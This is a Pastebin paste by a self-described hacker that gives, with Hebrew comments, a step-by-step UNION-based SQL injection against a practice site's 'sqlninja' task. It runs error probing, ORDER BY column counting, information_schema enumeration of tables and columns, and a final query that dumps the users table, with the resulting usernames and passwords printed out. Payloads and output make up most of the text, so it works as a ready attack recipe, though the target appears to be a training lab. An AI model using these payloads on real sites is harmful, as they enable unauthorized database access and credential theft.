API tools faq
paste
Advertisement
zurael_sTz

SQL injection Demo #1

zurael_sTz
Feb 9th, 2017
485
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.17 KB | None | 0 0
raw download clone embed print report
  1. <===============Hacker zurael sTz===============>
  2. =================twitter=============================
  3. https://twitter.com/zurael_stz
  4. =================facebook============================
  5. https://www.facebook.com/sTzisrael/
  6. =====================================================
  7. =================telegram============================
  8. https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
  9. =====================================================
  10. <===============Hacker zurael sTz===============>
  11.  
  12.  
  13. לאתר SQL תרגיל הזרקת
  14.  
  15. SQL נחפש שגיאת
  16.  
  17. http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1
  18.  
  19. ' " ; --'- : +--+ / : -- - : --+- : /*
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26. +order+by+100
  27. +order+by+100--
  28. +order+by+100--+
  29. +order+by+100--+-
  30. +'order+by+100--+-
  31.  
  32.  
  33.  
  34. Unknown column '100' in 'order clause'
  35.  
  36. נחפש כמה עמודות יש
  37.  
  38. +'order+by+1--+-
  39. +'order+by+2--+-
  40. +'order+by+3--+-
  41. +'order+by+4--+- errer : Unknown column '4' in 'order clause'
  42.  
  43.  
  44. אנחנו מקבלים שגיאה ב-4 זה אומר שיש לנו 3 עמודות
  45. עכשיו נריץ אותם
  46.  
  47.  
  48.  
  49. %27union+select+1,2,3--+-
  50.  
  51.  
  52.  
  53.  
  54. עכשיו מופיע לנו את מספר העמודה שפגיעה
  55. אצלי זה מספר 2
  56.  
  57.  
  58.  
  59.  
  60. נבדוק תגירסא ותשם של הבסיס נתונים
  61.  
  62. database()
  63. user()
  64. version()
  65.  
  66. עכשיו נשלוף את רשימת הטבלאות
  67.  
  68. %27union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--+-
  69.  
  70.  
  71.  
  72.  
  73.  
  74.  
  75. זה מה שקיבלנו
  76. "testtable1,userlogs,users"
  77.  
  78.  
  79.  
  80. CHAR(117, 115, 101, 114, 115)
  81.  
  82.  
  83. %27union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=CHAR(117,115,101,114,115)--+-
  84.  
  85. users שלפנו את רשימת הטבלה
  86.  
  87. table : users
  88. id,username,password,user_type,sec_code
  89.  
  90.  
  91. %27union+select+1,concat(username,0x2a,password),3+from+users--+-
  92.  
  93.  
  94. השמות משתמשים והסיסמאות
  95.  
  96. Username is : injector*khan
  97. Username is : decompiler*hacktract
  98. Username is : devilhunte*dante
  99. Username is : Zen*sec-idiots
  100. Username is : Zenodermus*security-i
  101. Username is : grayhat*hacker
  102. Username is : khan*haxor
  103. Username is : admin*sadmin
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!